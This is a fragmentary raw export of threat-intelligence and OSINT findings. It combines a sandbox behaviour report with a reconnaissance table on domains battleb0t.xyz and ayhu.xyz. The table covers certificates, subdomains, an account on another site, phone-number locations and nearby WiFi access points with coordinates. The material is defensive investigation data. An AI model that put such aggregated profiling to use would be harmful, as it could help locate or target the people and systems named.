"Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ce4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003396) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar11F6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar11F4.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3156 -s 132" (UID: 00000000-00003396)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab11F5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "Cab11E4.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"2E2XLV93.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2E2XLV93.txt]- [targetUID: 00000000-00003300]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002144]\n "~DF31E7ED02A5F249E9.TMP" has type "data"- Location: [%TEMP%\\~DF31E7ED02A5F249E9.TMP]- [targetUID: 00000000-00003300]\n "BBB0B9C986171FE6F65C60CFDD8B124F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BBB0B9C986171FE6F65C60CFDD8B124F]- [targetUID: 00000000-00002144]\n "~DFA6E69F16FC353641.TMP" has type "data"- Location: [%TEMP%\\~DFA6E69F16FC353641.TMP]- [targetUID: 00000000-00003300]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003300]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003300]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003300]\n "Cab11F5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab11F5.tmp]- [targetUID: 00000000-00002144]\n "Tar11F6.tmp" has type "data"- Location: [%TEMP%\\Tar11F6.tmp]- [targetUID: 00000000-00002144]\n "ZI3PUTBR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZI3PUTBR.txt]- [targetUID: 00000000-00003300]\n "LWLJIC7E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LWLJIC7E.txt]- [targetUID: 00000000-00003300]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003300]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003300]\n "Tar11F4.tmp" has type "data"- Location: [%TEMP%\\Tar11F4.tmp]- [targetUID: 00000000-00002144]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002144]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00002144]\n "~DFFFB79CCFFBC7C646.TMP" has type "data"- Location: [%TEMP%\\~DFFFB79CCFFBC7C646.TMP]- [targetUID: 00000000-00003300]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://regclickonetwoget.com/?viwe=B5ZRVJ5AIOMUMPXF7NBL-8845fcbc2b0cfc99c4cf3eaf075db59ceb055d0a37e8"- [Source: Input]\n Pattern match: "https://regclickonetwoget.com"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 200 OK\nContent-Length: 281\nContent-Type: application/json; charset=utf-8\nServer: Microsoft-HTTPAPI/2.0\nX-CMS-SearchElapsedTimeInMilliseconds: 33\nX-CMS-SearchBackendTimeInMilliseconds: 30\nX-CMS-SearchMatchedTotal: 1\nX-CMS-SearchMaxScore: 0\nX-CMS-SearchShardsTotal: 80\nX-CMS-SearchShardsSuccessful: 80\nX-CMS-SearchShardsFailed: 0\nX-CMS-SearchReturnedCount: 1\nX-CMS-DocumentStorageTier: Cache\nEdge-control: max-age=900s,downstream-ttl=900s\nX-CMS-ExecutionTimeInMilliseconds: 1\nAppEx-Activity-Id: 2a0f4d89-6c8c-4bb7-94b7-ccf6e776546c\nX-Trace-Context: {"ActivityId":"2a0f4d89-6c8c-4bb7-94b7-ccf6e776546c"}\nMS-CV: 2LJ42NbMmUONOa4RjIh+ew.0\nX-CMS-ServiceLocation: westus:0\nDate: Mon, 01 Aug 2022 18:19:19 GMT\n\n[{"list":[{"link":{"href":"goldbartext","title":""}},{"link":{"href":"okBtnText","title":""}},{"link":{"href":"cancelBtnText","title":""}},{"link":{"href":"intervalInDays","title":"20"}},{"link":{"href":"repeat","title":"1"}},{"link":{"href":"version","title":"3"}}],"_score":0.0}]"- [Source: SSL_52.155.62.95]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'descr | 34.74.170.74 |
| 2023-05-12 03:12:52 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14805058800 |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https://yoink.site/auth&response_type=code&scope=identify guilds.join | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Gab (Category: political)
https://gab.com/ayhu | ayhu |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.168): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | IntelWLAN (Net ID: 00:02:B3:C4:42:9C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.110): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.90): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:11:23 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Moscow, Russian Federation | +74955801111 |
| 2023-05-12 02:55:01 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 188.114.96.1 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Gitea - Gitea is a forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, code review, kanban boards, tickets, and wikis. It supports self-hosting but also provides a free public first-party instance. | cdn-185-199-111-153.github.com |
| 2023-05-12 02:59:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:31:e0:5d:42:f2:be:35:60:b1:bf:3c:dd:6a:3a:
e9:66:ce:65:b9:42:55:e5:1f:5b:0f:4a:7d:d2:dd:
d5:d5:2a:c8:4c:26:cc:d6:24:4c:c6:8a:d7:5d:8d:
ad:45:7b:81:26:49:fc:64:c6:a9:da:25:d4:46:11:
f7:82:81:c2:c2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:65:02:31:00:fd:8c:78:36:1c:71:84:4d:49:6c:11:58:c6:
12:a3:92:bc:28:1e:bf:5a:97:f1:6e:55:aa:8d:04:5e:52:f5:
43:5c:dd:10:26:0f:9b:fd:e7:99:a4:5c:91:c0:27:5e:27:02:
30:22:c5:07:b7:53:41:96:f1:8f:15:55:83:a7:26:c3:46:10:
aa:c0:ac:d9:d7:56:82:6e:c4:c8:be:12:fb:ae:7f:6d:a8:c6:
0a:3a:a2:c1:f9:63:1b:f1:d2:5d:a4:28:24
| ayhu.xyz |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 110.48.229.35.bc.googleusercontent.com | 35.229.48.110 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Computer security companies | baffin.netcraft.com |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Villakakelbond1 (Net ID: 00:0C:F6:CE:B2:88) | 50.8897, 6.0563 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | detyenship (Net ID: 00:02:2D:61:A7:66) | 32.8608, -79.9746 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Annie's Craft Co. (Net ID: 00:02:61:19:6C:00) | 34.0544, -118.244 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
